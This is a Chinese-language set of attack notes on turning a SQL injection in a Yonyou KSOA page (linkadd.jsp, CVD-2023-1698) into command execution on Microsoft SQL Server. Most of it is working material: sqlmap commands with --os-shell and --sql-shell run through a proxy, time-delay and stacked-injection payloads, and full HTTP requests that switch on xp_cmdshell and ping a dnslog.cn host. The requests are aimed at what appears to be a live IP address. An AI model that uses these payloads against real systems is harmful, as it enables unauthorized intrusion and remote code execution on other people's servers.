sql注入

select * from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’ // 存在返回1

1	python .\sqlmap.py -r .\point.txt --proxy sock5://127.0.0.1:7890

ponit.txt 的内容

id=666666 是注入点的位置，* 代表优先从这里开始

GET /linksframe/linkadd.jsp?id=666666* HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

SQLmap的过程，可以看到数据库是什么，比如是Microsoft SQl Server （也就是mssql）

1	python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --os-shell

通过这个语句，看看有没有shell可以捡

1	python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --sql-shell

通过这个语句，可以拿到sqlshell，执行sql语句。

1	http://1.196.238.71:93/linksframe/linkadd.jsp?id=666666';WAITFOR DELAY '0:0:5'--

1	GET /linksframe/linkadd.jsp?id=666666' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,'33';WAITFOR DELAY '0:0:4 HTTP/1.1

通过这种方式，看能否堆叠注入。

在sqlshell 里面查看是否开启xpcmdshell

1 2	select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' // 存在返回1

之所以要堆叠注入的原因，是因为需要开启xpcmdshell，他需要先开启，然后再保存配置。

' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,null;
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec master..xp_cmdshell 'ping 6byyxc.dnslog.cn

sys.fn_sqlvarbasetostr 的作用是能让md5回显。

结尾需要注释

	GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%209af%2cnull%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'GRYFF'))%2cnull%2cnull%2cnull%3bexec%20sp_configure%20'show%20advanced%20options'%2c%201%3breconfigure%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20--%20 HTTP/1.1
Host: 1.196.238.71:93
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
	Accept-Encoding: gzip, deflate
Connection: close

	GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bEXEC%20sp_configure%20'show%20advanced%20options'%2c1%3bRECONFIGURE%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20-- HTTP/1.1
Host: 1.196.238.71:93
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
	Accept-Encoding: gzip, deflate
Connection: close

	GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bCREATE%20TABLE%20cmdtmp%20(dir%20varchar(8000))%3b--%20 HTTP/1.1
Host: 1.196.238.71:93
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
	Accept-Encoding: gzip, deflate
Connection: close

而且有时sql注入，必须带上前面的查询结果（select那部分）

此次sql注入案例原型：

【9.6 例行优化】【sql升级rce模板】用友 KSOA linkadd.jsp sql 注入（CVD-2023-1698）.go

sql 注入xpcmdshell相关问题

sql注入